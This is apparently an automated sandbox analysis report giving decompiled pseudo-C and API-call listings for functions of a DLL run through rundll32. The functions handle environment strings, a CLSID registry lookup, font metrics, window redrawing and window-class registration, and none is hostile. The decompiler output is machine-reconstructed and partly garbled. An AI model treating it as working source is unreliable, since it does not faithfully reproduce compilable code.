                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t7;
                                                                                                            				CHAR* _t8;
                                                                                                            				WCHAR* _t16;
                                                                                                            				int _t19;
                                                                                                            				char* _t23;
                                                                                                            				int _t24;
                                                                                                            				long _t28;
                                                                                                            				int _t29;
                                                                                                            				void* _t34;
                                                                                                            				intOrPtr _t35;
                                                                                                            				WCHAR* _t36;
                                                                                                            				CHAR* _t37;
                                                                                                            				intOrPtr _t38;
                                                                                                            				int _t40;
                                                                                                            
                                                                                                            				_t7 =  *0x1004f700; // 0x1
                                                                                                            				_t29 = 0;
                                                                                                            				_t36 = 0;
                                                                                                            				_t38 = 2;
                                                                                                            				if(_t7 != 0) {
                                                                                                            					L6:
                                                                                                            					__eflags = _t7 - 1;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						__eflags = _t7 - _t38;
                                                                                                            						if(_t7 == _t38) {
                                                                                                            							L21:
                                                                                                            							_t8 = GetEnvironmentStrings();
                                                                                                            							_t37 = _t8;
                                                                                                            							__eflags = _t37 - _t29;
                                                                                                            							if(_t37 == _t29) {
                                                                                                            								L20:
                                                                                                            								return 0;
                                                                                                            							}
                                                                                                            							__eflags =  *_t37 - _t29;
                                                                                                            							if( *_t37 == _t29) {
                                                                                                            								L25:
                                                                                                            								_t39 = _t8 - _t37 + 1;
                                                                                                            								_t34 = E100107B6(_t8 - _t37 + 1);
                                                                                                            								__eflags = _t34 - _t29;
                                                                                                            								if(_t34 != _t29) {
                                                                                                            									E10011440(_t34, _t37, _t39);
                                                                                                            								} else {
                                                                                                            									_t34 = 0;
                                                                                                            								}
                                                                                                            								FreeEnvironmentStringsA(_t37);
                                                                                                            								return _t34;
                                                                                                            							} else {
                                                                                                            								goto L23;
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								do {
                                                                                                            									L23:
                                                                                                            									_t8 =  &(_t8[1]);
                                                                                                            									__eflags =  *_t8 - _t29;
                                                                                                            								} while ( *_t8 != _t29);
                                                                                                            								_t8 =  &(_t8[1]);
                                                                                                            								__eflags =  *_t8 - _t29;
                                                                                                            							} while ( *_t8 != _t29);
                                                                                                            							goto L25;
                                                                                                            						}
                                                                                                            						__eflags = _t7 - _t29;
                                                                                                            						if(_t7 == _t29) {
                                                                                                            							goto L21;
                                                                                                            						}
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					L7:
                                                                                                            					if(_t36 != _t29) {
                                                                                                            						L9:
                                                                                                            						_t16 = _t36;
                                                                                                            						if( *_t36 == _t29) {
                                                                                                            							L12:
                                                                                                            							_t35 = __imp__WideCharToMultiByte; // 0x76ec6840
                                                                                                            							_t19 = (_t16 - _t36 >> 1) + 1;
                                                                                                            							_v4 = _t19;
                                                                                                            							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
                                                                                                            							if(_t40 != _t29) {
                                                                                                            								_t23 = E100107B6(_t40);
                                                                                                            								_v8 = _t23;
                                                                                                            								if(_t23 != _t29) {
                                                                                                            									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
                                                                                                            									_t52 = _t24;
                                                                                                            									if(_t24 == 0) {
                                                                                                            										_push(_v8);
                                                                                                            										E100107C8(_t29, _t35, _t36, _t52);
                                                                                                            										_v8 = _t29;
                                                                                                            									}
                                                                                                            									_t29 = _v8;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							FreeEnvironmentStringsW(_t36);
                                                                                                            							return _t29;
                                                                                                            						} else {
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							do {
                                                                                                            								L10:
                                                                                                            								_t16 = _t16 + _t38;
                                                                                                            							} while ( *_t16 != _t29);
                                                                                                            							_t16 = _t16 + _t38;
                                                                                                            						} while ( *_t16 != _t29);
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					_t36 = GetEnvironmentStringsW();
                                                                                                            					if(_t36 == _t29) {
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				_t36 = GetEnvironmentStringsW();
                                                                                                            				if(_t36 == 0) {
                                                                                                            					_t28 = GetLastError();
                                                                                                            					__eflags = _t28 - 0x78;
                                                                                                            					if(_t28 != 0x78) {
                                                                                                            						_t7 =  *0x1004f700; // 0x1
                                                                                                            					} else {
                                                                                                            						_t7 = _t38;
                                                                                                            						 *0x1004f700 = _t7;
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					 *0x1004f700 = 1;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            			}
























                                                                                                            APIs
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001669B
                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                                                            • GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016742
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 1001677E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 883850110-4125583295
                                                                                                            • Opcode ID: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction ID: 9752ab07c098c977bc575d501e7eaa0deb9efe59c3b15e47417eb48d6ecdcefd
                                                                                                            • Opcode Fuzzy Hash: bfeabb1aff3bc99bbfe24a1f77970b714d91aefed0498c732c899eb5009dd72e
                                                                                                            • Instruction Fuzzy Hash: 7831A5B260D26A6FE311EF654CC882BBADCEB4E1D8712092DF681CB191D671DCC496A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002583A(void* _a4, intOrPtr _a8) {
                                                                                                            				void* _v8;
                                                                                                            				void* _v12;
                                                                                                            				int _v16;
                                                                                                            				char* _v20;
                                                                                                            				int _v24;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				signed int _t35;
                                                                                                            				void* _t37;
                                                                                                            				void* _t42;
                                                                                                            				int* _t43;
                                                                                                            
                                                                                                            				_t43 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_v20 = E100017D0(_a8, 0x104);
                                                                                                            				_v16 = 0x104;
                                                                                                            				_t42 = RegOpenKeyA;
                                                                                                            				_v24 = 0;
                                                                                                            				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
                                                                                                            					_push(_t37);
                                                                                                            					_v8 = 0;
                                                                                                            					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
                                                                                                            						_a4 = 0;
                                                                                                            						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
                                                                                                            							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
                                                                                                            							asm("sbb esi, esi");
                                                                                                            							_t43 =  ~_t35 + 1;
                                                                                                            							RegCloseKey(_a4);
                                                                                                            						}
                                                                                                            						RegCloseKey(_v8);
                                                                                                            					}
                                                                                                            					RegCloseKey(_v12);
                                                                                                            					_pop(_t37);
                                                                                                            				}
                                                                                                            				E10006CE2(_t37, _a8, _t42, 0xffffffff);
                                                                                                            				return _t43;
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                            • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                            • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$QueryValue
                                                                                                            • String ID: CLSID$InProcServer32
                                                                                                            • API String ID: 3523390698-323508013
                                                                                                            • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                                                            • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                                                            • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10036531() {
                                                                                                            				struct HWND__* _v4;
                                                                                                            				void* _v68;
                                                                                                            				void* _v76;
                                                                                                            				int _t4;
                                                                                                            				int _t10;
                                                                                                            				struct HDC__* _t15;
                                                                                                            				void* _t18;
                                                                                                            
                                                                                                            				_t4 =  *0x1004b8cc; // 0xffffffff
                                                                                                            				if(_t4 == 0xffffffff) {
                                                                                                            					_t15 = GetDC(0);
                                                                                                            					_v4 = 0;
                                                                                                            					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
                                                                                                            					if(_t18 != 0) {
                                                                                                            						_v68 = SelectObject(_t15, _t18);
                                                                                                            					}
                                                                                                            					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
                                                                                                            					if(_t18 != 0) {
                                                                                                            						SelectObject(_t15, _v76);
                                                                                                            						DeleteObject(_t18);
                                                                                                            					}
                                                                                                            					ReleaseDC(0, _t15);
                                                                                                            					_t10 =  *0x1004b8cc; // 0xffffffff
                                                                                                            					return _t10;
                                                                                                            				}
                                                                                                            				return _t4;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 10036543
                                                                                                            • GetSystemMetrics.USER32 ref: 10036567
                                                                                                            • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                                                            • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                                                            • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                                                            • ReleaseDC.USER32 ref: 100365AC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                            • String ID: Marlett
                                                                                                            • API String ID: 1397664628-3688754224
                                                                                                            • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                                                            • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                                                            • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E1003982F(void* __ecx) {
                                                                                                            				intOrPtr _t52;
                                                                                                            				intOrPtr _t53;
                                                                                                            				void* _t57;
                                                                                                            				CHAR* _t60;
                                                                                                            				CHAR* _t88;
                                                                                                            				CHAR* _t89;
                                                                                                            				void* _t102;
                                                                                                            				CHAR* _t103;
                                                                                                            				CHAR* _t105;
                                                                                                            				CHAR* _t106;
                                                                                                            				CHAR* _t107;
                                                                                                            				void* _t111;
                                                                                                            				short* _t112;
                                                                                                            				void* _t122;
                                                                                                            				void* _t127;
                                                                                                            				void* _t129;
                                                                                                            				void* _t131;
                                                                                                            
                                                                                                            				_t127 = _t129 - 0x8c;
                                                                                                            				_t52 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
                                                                                                            				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
                                                                                                            				_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
                                                                                                            				E10011C50(_t112, 0, 0x20);
                                                                                                            				_t103 =  *(_t127 + 0x98);
                                                                                                            				_t131 = _t129 - 0x10c + 0xc;
                                                                                                            				_t109 = _t103;
                                                                                                            				 *(_t127 - 0x80) = _t127 - 0x78;
                                                                                                            				if(E100244DE(_t103, 0x100410f8) == 0) {
                                                                                                            					_t109 = _t103;
                                                                                                            					_t57 = E100244DE(_t103, 0x1003d114);
                                                                                                            					_push(0x100);
                                                                                                            					_push(_t127 - 0x78);
                                                                                                            					if(_t57 == 0) {
                                                                                                            						_push(0xf108);
                                                                                                            						E100245D3();
                                                                                                            						 *_t112 = 0xf108;
                                                                                                            						L12:
                                                                                                            						_t60 = 0;
                                                                                                            						if( *(_t127 - 0x80) == 0) {
                                                                                                            							L14:
                                                                                                            							__imp__#2(_t60);
                                                                                                            							 *(_t112 + 8) = _t60;
                                                                                                            							if( *(_t112 + 4) == 0) {
                                                                                                            								_t106 =  *(E100373B5() + 0x10);
                                                                                                            								if(_t106 != 0) {
                                                                                                            									_t115 = lstrlenA(_t106) + 1;
                                                                                                            									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            									_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            								} else {
                                                                                                            									_t60 = 0;
                                                                                                            								}
                                                                                                            								__imp__#2(_t60);
                                                                                                            								 *(_t112 + 4) = _t60;
                                                                                                            							}
                                                                                                            							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
                                                                                                            								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
                                                                                                            								if(_t105 != 0) {
                                                                                                            									_t126 = lstrlenA(_t105) + 1;
                                                                                                            									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            								} else {
                                                                                                            									_t60 = 0;
                                                                                                            								}
                                                                                                            								__imp__#2(_t60);
                                                                                                            								 *(_t112 + 0xc) = _t60;
                                                                                                            							}
                                                                                                            							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
                                                                                                            						}
                                                                                                            						L13:
                                                                                                            						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
                                                                                                            						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            					_push(0xf10a);
                                                                                                            					E100245D3();
                                                                                                            					 *_t112 = 0xf10a;
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            				 *(_t127 - 0x80) = _t103[0xc];
                                                                                                            				 *_t112 = _t103[8];
                                                                                                            				 *(_t112 + 0x10) = _t103[0x10];
                                                                                                            				 *(_t112 + 0x1c) = _t103[0x1c];
                                                                                                            				_t88 = _t103[0x14];
                                                                                                            				 *(_t127 + 0x98) = _t88;
                                                                                                            				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
                                                                                                            					if(_t88 != 0) {
                                                                                                            						_t121 = lstrlenA(_t88) + 1;
                                                                                                            						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            					}
                                                                                                            					__imp__#2(_t88);
                                                                                                            					 *(_t112 + 0xc) = _t88;
                                                                                                            				}
                                                                                                            				_t107 = _t103[0x18];
                                                                                                            				_t89 = 0;
                                                                                                            				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
                                                                                                            					if(_t107 != 0) {
                                                                                                            						_t119 = lstrlenA(_t107) + 1;
                                                                                                            						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
                                                                                                            						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
                                                                                                            						_t112 =  *((intOrPtr*)(_t127 + 0x94));
                                                                                                            					}
                                                                                                            					__imp__#2(_t89);
                                                                                                            					 *(_t112 + 4) = _t89;
                                                                                                            				}
                                                                                                            				goto L12;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398BA
                                                                                                              • Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 100398E6
                                                                                                            • lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039925
                                                                                                            • lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1003999C
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100399BC
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 100399E3
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10039A0C
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10039A2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2903237683-0
                                                                                                            • Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
                                                                                                            • Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                                                            • Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002F6AD(void* __ecx, int _a4) {
                                                                                                            				int _v8;
                                                                                                            				struct tagRECT _v24;
                                                                                                            				long _t39;
                                                                                                            				int _t42;
                                                                                                            				int _t43;
                                                                                                            				int _t62;
                                                                                                            				int _t66;
                                                                                                            				void* _t68;
                                                                                                            				long _t69;
                                                                                                            				int _t71;
                                                                                                            
                                                                                                            				_t69 = _a4;
                                                                                                            				_t68 = __ecx;
                                                                                                            				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
                                                                                                            				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                                                                                                            					GetWindowRect( *(_t68 + 0x1c),  &_v24);
                                                                                                            					_t42 = _a4;
                                                                                                            					_t66 =  *(_t42 + 0x10);
                                                                                                            					_t71 = _v24.right - _v24.left;
                                                                                                            					_t62 = _v24.bottom - _v24.top;
                                                                                                            					_t43 =  *(_t42 + 0x14);
                                                                                                            					_v8 = _t66;
                                                                                                            					_a4 = _t43;
                                                                                                            					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
                                                                                                            						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
                                                                                                            						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
                                                                                                            						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            						_t66 = _v8;
                                                                                                            						_t43 = _a4;
                                                                                                            					}
                                                                                                            					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
                                                                                                            						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
                                                                                                            						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
                                                                                                            						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
                                                                                                            					}
                                                                                                            					return _t43;
                                                                                                            				}
                                                                                                            				return _t39;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                                                            • GetWindowRect.USER32 ref: 1002F6DA
                                                                                                            • SetRect.USER32 ref: 1002F714
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                                                            • SetRect.USER32 ref: 1002F73A
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                                                            • SetRect.USER32 ref: 1002F774
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                                                            • SetRect.USER32 ref: 1002F796
                                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Invalidate$Window$Proc
                                                                                                            • String ID:
                                                                                                            • API String ID: 570070710-0
                                                                                                            • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                                                            • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                                                            • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10020B9B() {
                                                                                                            				signed int _t39;
                                                                                                            				CHAR* _t43;
                                                                                                            				int _t44;
                                                                                                            				WNDCLASSA* _t63;
                                                                                                            				void* _t71;
                                                                                                            				void* _t73;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a552, _t71);
                                                                                                            				_t63 =  *(_t71 + 8);
                                                                                                            				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
                                                                                                            				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
                                                                                                            					if(RegisterClassA(_t63) == 0) {
                                                                                                            						L5:
                                                                                                            						_t39 = 0;
                                                                                                            					} else {
                                                                                                            						 *(_t71 - 0x18) = 1;
                                                                                                            						if( *((char*)(E100373B5() + 0x14)) == 0) {
                                                                                                            							L10:
                                                                                                            							_t39 =  *(_t71 - 0x18);
                                                                                                            						} else {
                                                                                                            							E10037A1B(1);
                                                                                                            							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                            							_t43 = E100373B5() + 0x34;
                                                                                                            							 *(_t71 - 0x14) = _t43;
                                                                                                            							_t44 = lstrlenA(_t43);
                                                                                                            							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
                                                                                                            							if(_t44 + _t13 < 0x1000) {
                                                                                                            								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
                                                                                                            								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
                                                                                                            									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
                                                                                                            									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
                                                                                                            								} else {
                                                                                                            									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
                                                                                                            									 *(_t71 + 0xa) = 0xa;
                                                                                                            									 *((char*)(_t71 + 0xb)) = 0;
                                                                                                            									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
                                                                                                            								}
                                                                                                            								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
                                                                                                            								E10037A7E(1);
                                                                                                            								goto L10;
                                                                                                            							} else {
                                                                                                            								goto L5;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t39 = 1;
                                                                                                            				}
